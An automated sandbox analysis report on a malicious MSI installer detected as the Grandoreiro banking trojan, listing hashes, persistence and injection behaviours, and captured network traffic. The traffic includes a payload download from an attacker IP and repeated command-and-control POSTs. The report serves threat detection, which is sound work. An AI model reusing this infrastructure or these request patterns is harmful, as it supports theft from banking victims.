Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-es -
resource tags
arch:x64arch:x86image:win10v2004-20230220-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
12/04/2023, 15:38 UTC
Static task
static1
Behavioral task
behavioral1
Sample
CFDI-418.msi
Resource
win7-20230220-es
Behavioral task
behavioral2
Sample
CFDI-418.msi
Resource
win10v2004-20230220-es
General
-
Target
CFDI-418.msi
-
Size
1.7MB
-
MD5
436ec5aea13f250c2cccb899b09c30fb
-
SHA1
d34643db6cb8269bc1ef7472f76c0f7613e68768
-
SHA256
d85571ef1ca53d5dcac1a99b06a64af069a20dca7e9d8b7706556b1317b4fb2f
-
SHA512
b5d52b50544452dcd9b877c7f77a4f2fd4961bcab745d1666e6f2221bfd2c416873c8d88518f8471297873899125313c62d25885d7870eec04bbc3be11f502df
-
SSDEEP
49152:CgJZBYbX+lDiJ4H3fMUgmu1M88r6F5mCmR+iYVTA:lj8ulDHXDg/a8o6UYdA
Malware Config
Signatures
-
Detects Grandoreiro payload 5 IoCs
resource yara_rule behavioral2/files/0x0008000000023039-188.dat family_grandoreiro_v1 behavioral2/files/0x0008000000023039-199.dat family_grandoreiro_v1 behavioral2/files/0x0008000000023039-200.dat family_grandoreiro_v1 behavioral2/memory/1156-201-0x0000000001400000-0x0000000002400000-memory.dmp family_grandoreiro_v1 behavioral2/memory/1156-209-0x0000000001400000-0x0000000002400000-memory.dmp family_grandoreiro_v1 -
Grandoreiro
Part of a group of banking trojans, targeting Spanish and Portuguese speaking countries.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 18 4412 MsiExec.exe -
resource yara_rule behavioral2/files/0x000300000001e4c4-149.dat aspack_v212_v242 behavioral2/files/0x000300000001e4c4-150.dat aspack_v212_v242 -
Executes dropped EXE 1 IoCs
pid Process 1156 UIDCASTER.exe -
Loads dropped DLL 8 IoCs
pid Process 4412 MsiExec.exe 4412 MsiExec.exe 4412 MsiExec.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Run UIDCASTER.exe Set value (str) \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cedgseuwei = "C:\\Nvsofrsv\\UIDCASTER.exe" UIDCASTER.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe -
Drops file in Windows directory 10 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI813C.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI8814.tmp msiexec.exe File created C:\Windows\Installer\e566f97.msi msiexec.exe File opened for modification C:\Windows\Installer\e566f97.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI7033.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{60E1AB79-B269-4CAB-8F2F-5D392FB01D15} msiexec.exe File opened for modification C:\Windows\Installer\MSI8786.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1732 msiexec.exe 1732 msiexec.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe 1156 UIDCASTER.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1156 UIDCASTER.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeShutdownPrivilege 676 msiexec.exe Token: SeIncreaseQuotaPrivilege 676 msiexec.exe Token: SeSecurityPrivilege 1732 msiexec.exe Token: SeCreateTokenPrivilege 676 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 676 msiexec.exe Token: SeLockMemoryPrivilege 676 msiexec.exe Token: SeIncreaseQuotaPrivilege 676 msiexec.exe Token: SeMachineAccountPrivilege 676 msiexec.exe Token: SeTcbPrivilege 676 msiexec.exe Token: SeSecurityPrivilege 676 msiexec.exe Token: SeTakeOwnershipPrivilege 676 msiexec.exe Token: SeLoadDriverPrivilege 676 msiexec.exe Token: SeSystemProfilePrivilege 676 msiexec.exe Token: SeSystemtimePrivilege 676 msiexec.exe Token: SeProfSingleProcessPrivilege 676 msiexec.exe Token: SeIncBasePriorityPrivilege 676 msiexec.exe Token: SeCreatePagefilePrivilege 676 msiexec.exe Token: SeCreatePermanentPrivilege 676 msiexec.exe Token: SeBackupPrivilege 676 msiexec.exe Token: SeRestorePrivilege 676 msiexec.exe Token: SeShutdownPrivilege 676 msiexec.exe Token: SeDebugPrivilege 676 msiexec.exe Token: SeAuditPrivilege 676 msiexec.exe Token: SeSystemEnvironmentPrivilege 676 msiexec.exe Token: SeChangeNotifyPrivilege 676 msiexec.exe Token: SeRemoteShutdownPrivilege 676 msiexec.exe Token: SeUndockPrivilege 676 msiexec.exe Token: SeSyncAgentPrivilege 676 msiexec.exe Token: SeEnableDelegationPrivilege 676 msiexec.exe Token: SeManageVolumePrivilege 676 msiexec.exe Token: SeImpersonatePrivilege 676 msiexec.exe Token: SeCreateGlobalPrivilege 676 msiexec.exe Token: SeRestorePrivilege 1732 msiexec.exe Token: SeTakeOwnershipPrivilege 1732 msiexec.exe Token: SeRestorePrivilege 1732 msiexec.exe Token: SeTakeOwnershipPrivilege 1732 msiexec.exe Token: SeRestorePrivilege 1732 msiexec.exe Token: SeTakeOwnershipPrivilege 1732 msiexec.exe Token: SeRestorePrivilege 1732 msiexec.exe Token: SeTakeOwnershipPrivilege 1732 msiexec.exe Token: SeRestorePrivilege 1732 msiexec.exe Token: SeTakeOwnershipPrivilege 1732 msiexec.exe Token: SeRestorePrivilege 1732 msiexec.exe Token: SeTakeOwnershipPrivilege 1732 msiexec.exe Token: SeRestorePrivilege 1732 msiexec.exe Token: SeTakeOwnershipPrivilege 1732 msiexec.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 676 msiexec.exe 676 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1156 UIDCASTER.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1732 wrote to memory of 4412 1732 msiexec.exe 89 PID 1732 wrote to memory of 4412 1732 msiexec.exe 89 PID 1732 wrote to memory of 4412 1732 msiexec.exe 89 PID 4412 wrote to memory of 1156 4412 MsiExec.exe 97 PID 4412 wrote to memory of 1156 4412 MsiExec.exe 97 PID 4412 wrote to memory of 1156 4412 MsiExec.exe 97
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\CFDI-418.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:676
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E5A1241BAC43CFA3B384A16C58CC75542⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Nvsofrsv\UIDCASTER.exe"C:\Nvsofrsv\UIDCASTER.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1156
-
-
Network
-
Remote address:8.8.8.8:53Request138.238.32.23.in-addr.arpaIN PTRResponse138.238.32.23.in-addr.arpaIN PTRa23-32-238-138deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request241.150.49.20.in-addr.arpaIN PTRResponse
-
Remote address:50.114.32.174:244RequestGET /king40.zip?Admin-Espa�ol%20(Espa�a,%20internacional) HTTP/1.1
User-Agent: Msiexec
Host: 50.114.32.174:244
ResponseHTTP/1.1 200 OK
Content-Length: 18670124
Accept-Ranges: bytes
Server: HFS 2.4rc5
Set-Cookie: HFS_SID_=0.913143346551806; path=/; HttpOnly
ETag: 30C7D52D5F55D37314C0C492FB9D2D56
Last-Modified: Wed, 12 Apr 2023 13:31:08 GMT
Content-Disposition: attachment; filename*=UTF-8'"king40.zip";
-
Remote address:8.8.8.8:53Request71.159.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request108.211.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request174.32.114.50.in-addr.arpaIN PTRResponse174.32.114.50.in-addr.arpaIN PTR50-114-32-174masterdawebcom
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request0.77.109.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttime.nist.govIN AResponsetime.nist.govIN CNAMEntp1.glb.nist.govntp1.glb.nist.govIN A132.163.97.6
-
Remote address:8.8.8.8:53Requestmtb475f304a.zapto.orgIN AResponsemtb475f304a.zapto.orgIN A50.114.32.174
-
Remote address:8.8.8.8:53Request6.97.163.132.in-addr.arpaIN PTRResponse6.97.163.132.in-addr.arpaIN PTRtime-e-wwvnistgov
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ACTION=HELLO HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 7248
ResponseHTTP/1.1 200 OK
SET-COOKIE: ID=D9AC23F8AF5F4DA088B8E13144F99C57
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ACTION=START&ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 7250
ResponseHTTP/1.1 200 OK
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 180
ResponseHTTP/1.1 200 OK
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 33
ResponseHTTP/1.1 200 OK
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 34
ResponseHTTP/1.1 200 OK
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 30
ResponseHTTP/1.1 200 OK
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 30
ResponseHTTP/1.1 200 OK
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 28
ResponseHTTP/1.1 200 OK
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 30
ResponseHTTP/1.1 200 OK
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 28
ResponseHTTP/1.1 200 OK
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 31
ResponseHTTP/1.1 200 OK
-
Remote address:50.114.32.174:443RequestPOST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
HOST: 50.114.32.174
CONTENT-LENGTH: 30
-
Remote address:8.8.8.8:53Requestassets.msn.comIN AResponseassets.msn.comIN CNAMEassets.msn.com.edgekey.netassets.msn.com.edgekey.netIN CNAMEe28578.d.akamaiedge.nete28578.d.akamaiedge.netIN A95.101.74.151e28578.d.akamaiedge.netIN A95.101.74.139
-
GEThttps://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtaskRemote address:95.101.74.151:443RequestGET /serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtask HTTP/2.0
host: assets.msn.com
x-search-account: None
accept-encoding: gzip, deflate
x-device-machineid: {B5D67584-1FEF-4C28-8532-FCD3CF2C23D0}
x-userageclass: Unknown
x-bm-market: ES
x-bm-dateformat: dd/MM/yyyy
x-device-ossku: 48
x-bm-dtz: 0
x-deviceid: 0100B2E609000CC3
x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11D898D7,FX:11DB147C,FX:11DE505A,FX:11E11E97,FX:11E3E2BA,FX:11E50151,FX:11E9EE98,FX:11F1992A,FX:11F4161E,FX:11F41B68,FX:11FB0F2F,FX:1201B330,FX:1202B7FC,FX:120BB68E,FX:121A20E1,FX:121BF15F,FX:121E5EC8,FX:122D8E86,FX:123031A3,FX:1231B88B,FX:123371B1,FX:1233C945,FX:123D7C31,FX:1240013C,FX:1246E4A3,FX:1248306D,FX:124B38D0,FX:1250080B,FX:125A7FDA,FX:1264FA75,FX:126DBC22,FX:127159BE,FX:12769734,FX:127C935B,FX:127DC03A,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:129135BB
sitename: www.msn.com
x-bm-theme: 000000;0078d7
muid: 681106677AA44FECB67AC912899AA560
x-agent-deviceid: 0100B2E609000CC3
x-bm-onlinesearchdisabled: true
x-bm-cbt: 1681321248
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.2.19041; 10.0.0.0.19041.1288) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
x-device-isoptin: false
accept-language: es-ES, es, en-US, en
x-device-touch: false
x-device-clientsession: AC038B2FF4A941EEAF4BE0E175E3657A
cookie: MUID=681106677AA44FECB67AC912899AA560
ResponseHTTP/2.0 200
server: Kestrel
access-control-allow-credentials: true
access-control-allow-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent
access-control-allow-methods: PUT,PATCH,POST,GET,OPTIONS,DELETE
access-control-allow-origin: *.msn.com
access-control-expose-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent
content-encoding: gzip
ddd-authenticatedwithjwtflow: False
ddd-usertype: AnonymousMuid
ddd-tmpl: SevereWeather_cold:1;winbadge:1;coldStartUpsell:1;Nowcast_cold:1;tbn:0;lowT:0;SportsMatch_all:1;WildFire_cold:1;partialResponse:1;TeaserTemp_cold:1;coldStart:1;TeaserVisibility_cold:1;lowC:0
ddd-feednewsitemcount: 0
x-wpo-activityid: 2E723C4B-5F0B-4696-8D18-42C08A038718|2023-04-12T15:40:50.6214239Z|fabric:/wpo|FRC|WPO_26
ddd-activityid: 2e723c4b-5f0b-4696-8d18-42c08a038718
ddd-strategyexecutionlatency: 00:00:00.1679464
ddd-debugid: 2e723c4b-5f0b-4696-8d18-42c08a038718|2023-04-12T15:40:50.6269706Z|fabric:/winfeed|FRC|WinFeed_70
onewebservicelatency: 169
x-msedge-responseinfo: 169
x-ceto-ref: 6436d10247154eb98c68c020d7cfcb1a|2023-04-12T15:40:50.454Z
expires: Wed, 12 Apr 2023 15:40:50 GMT
date: Wed, 12 Apr 2023 15:40:50 GMT
content-length: 1856
akamai-request-bc: [a=92.123.71.151,b=205081929,c=g,n=NL__SCHIPHOL,o=20940],[a=20.74.25.147,c=o]
server-timing: clientrtt; dur=17, clienttt; dur=186, origin; dur=185 , cdntime; dur=1
akamai-cache-status: Miss from child
akamai-server-ip: 92.123.71.151
akamai-request-id: c394d49
x-as-suppresssetcookie: 1
cache-control: private, max-age=0
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
timing-allow-origin: *
vary: Origin
-
Remote address:8.8.8.8:53Request151.74.101.95.in-addr.arpaIN PTRResponse151.74.101.95.in-addr.arpaIN PTRa95-101-74-151deploystaticakamaitechnologiescom
-
50.114.32.174:244http://50.114.32.174:244/king40.zip?Admin-Espa�ol%20(Espa�a,%20internacional)httpMsiExec.exe675.4kB 19.3MB 14597 14561
HTTP Request
GET http://50.114.32.174:244/king40.zip?Admin-Espa�ol%20(Espa�a,%20internacional)HTTP Response
200 -
322 B 7
-
322 B 7
-
322 B 7
-
322 B 7
-
190 B 223 B 4 4
-
190 B 132 B 4 3
-
190 B 132 B 4 3
-
190 B 223 B 4 4
-
190 B 223 B 4 4
-
50.114.32.174:443http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57httpUIDCASTER.exe25.2kB 30.8kB 41 45
HTTP Request
POST http://50.114.32.174/$rdgate?ACTION=HELLOHTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ACTION=START&ID=D9AC23F8AF5F4DA088B8E13144F99C57HTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57HTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57HTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57HTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57HTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57HTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57HTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57HTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57HTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57HTTP Response
200HTTP Request
POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 -
95.101.74.151:443https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtasktls, http22.6kB 11.1kB 20 19
HTTP Request
GET https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtaskHTTP Response
200
-
72 B 137 B 1 1
DNS Request
138.238.32.23.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
241.150.49.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
71.159.190.20.in-addr.arpa
-
74 B 145 B 1 1
DNS Request
108.211.229.192.in-addr.arpa
-
72 B 115 B 1 1
DNS Request
174.32.114.50.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
28.118.140.52.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
0.77.109.52.in-addr.arpa
-
59 B 98 B 1 1
DNS Request
time.nist.gov
DNS Response
132.163.97.6
-
67 B 83 B 1 1
DNS Request
mtb475f304a.zapto.org
DNS Response
50.114.32.174
-
71 B 104 B 1 1
DNS Request
6.97.163.132.in-addr.arpa
-
60 B 166 B 1 1
DNS Request
assets.msn.com
DNS Response
95.101.74.15195.101.74.139
-
72 B 137 B 1 1
DNS Request
151.74.101.95.in-addr.arpa
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
754B
MD530041535412d0a2e1b55a3bf9498ba43
SHA164ec57f945be08de3963cf48a73809a5c621dd25
SHA2569b5f9f1405ab87c80b079eb099ec5a292259dc7e210d12ca6bc0cfcd57126e29
SHA512d19f61fccda7ede4e98f598b53c81dd82bbff4c35e9577e44545658b7cf1545e0528b21a43b0c4f608323d3a37ef24681266c1107b793130eff6ad4c63795859
-
Filesize
2.2MB
MD5b5485d229f8078575d639fb903b4fca7
SHA16a67a6bb694df592819d398a645504b2c7a2221c
SHA2569625e775e955281732270b7a0fc468bef83b468be85e82e0659973aefa369782
SHA5125d54f343b986d33c3e7de1450d8b6386bac66a9aeb8a77b0a81652cf2592e8f85847185d6e09e8c486a224bf21eb195308be1f489bbac615bf99d5fc760d85f8
-
Filesize
2.2MB
MD5b5485d229f8078575d639fb903b4fca7
SHA16a67a6bb694df592819d398a645504b2c7a2221c
SHA2569625e775e955281732270b7a0fc468bef83b468be85e82e0659973aefa369782
SHA5125d54f343b986d33c3e7de1450d8b6386bac66a9aeb8a77b0a81652cf2592e8f85847185d6e09e8c486a224bf21eb195308be1f489bbac615bf99d5fc760d85f8
-
Filesize
2.2MB
MD5b5485d229f8078575d639fb903b4fca7
SHA16a67a6bb694df592819d398a645504b2c7a2221c
SHA2569625e775e955281732270b7a0fc468bef83b468be85e82e0659973aefa369782
SHA5125d54f343b986d33c3e7de1450d8b6386bac66a9aeb8a77b0a81652cf2592e8f85847185d6e09e8c486a224bf21eb195308be1f489bbac615bf99d5fc760d85f8
-
Filesize
1.2MB
MD54003e34416ebd25e4c115d49dc15e1a7
SHA1faf95ec65cde5bd833ce610bb8523363310ec4ad
SHA256c06430b8cb025be506be50a756488e1bcc3827c4f45158d93e4e3eeb98ce1e4f
SHA51288f5d417377cd62bde417640a79b6ac493e80f0c8b1f63a99378a2a67695ef8e4a541cedb91acfa296ed608e821fee466983806f0d082ed2e74b0cd93eb4fb84
-
Filesize
1.2MB
MD54003e34416ebd25e4c115d49dc15e1a7
SHA1faf95ec65cde5bd833ce610bb8523363310ec4ad
SHA256c06430b8cb025be506be50a756488e1bcc3827c4f45158d93e4e3eeb98ce1e4f
SHA51288f5d417377cd62bde417640a79b6ac493e80f0c8b1f63a99378a2a67695ef8e4a541cedb91acfa296ed608e821fee466983806f0d082ed2e74b0cd93eb4fb84
-
Filesize
13.0MB
MD587c7411e05ff159a3707869adc9d5c01
SHA1d147cfdc5d2ea979aa757423a0a22577c45acbe1
SHA256207d66dae08ca39065019355802604768b213ed2817e78bea128f136784af6a7
SHA512a5a22ed12fa2ea7d343fa38e527fab8735924e350dd138b72e2bec4417825b8bab52e6814ced320f67030fa3a0b88afd7a50ac1714476f40d9ec54c33acae922
-
Filesize
13.0MB
MD587c7411e05ff159a3707869adc9d5c01
SHA1d147cfdc5d2ea979aa757423a0a22577c45acbe1
SHA256207d66dae08ca39065019355802604768b213ed2817e78bea128f136784af6a7
SHA512a5a22ed12fa2ea7d343fa38e527fab8735924e350dd138b72e2bec4417825b8bab52e6814ced320f67030fa3a0b88afd7a50ac1714476f40d9ec54c33acae922
-
Filesize
13.0MB
MD587c7411e05ff159a3707869adc9d5c01
SHA1d147cfdc5d2ea979aa757423a0a22577c45acbe1
SHA256207d66dae08ca39065019355802604768b213ed2817e78bea128f136784af6a7
SHA512a5a22ed12fa2ea7d343fa38e527fab8735924e350dd138b72e2bec4417825b8bab52e6814ced320f67030fa3a0b88afd7a50ac1714476f40d9ec54c33acae922
-
Filesize
151.5MB
MD5fbc66087992dfd5da6d5955144df904d
SHA1d33433f0c79ebaf3b9169d9c596619110f0db5ca
SHA2561b14c6d1c6c64ac56f11787ce86e631694361aac36bbf3dfb3c18615299b3f3f
